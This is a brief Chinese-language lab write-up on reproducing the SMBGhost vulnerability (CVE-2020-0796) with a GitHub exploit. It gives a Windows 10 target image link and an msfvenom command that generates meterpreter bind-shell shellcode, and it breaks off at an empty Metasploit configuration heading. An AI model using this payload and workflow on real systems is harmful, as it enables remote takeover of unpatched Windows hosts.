CVE-2020-0796复现

看到GitHub上面有对应的exp,就复现看看。

image-20200608145057355

复现

靶机地址

1
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

使用msf生成对应payload

1
sfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

使用python3运行脚本即可。

image-20200608145057355

msf配置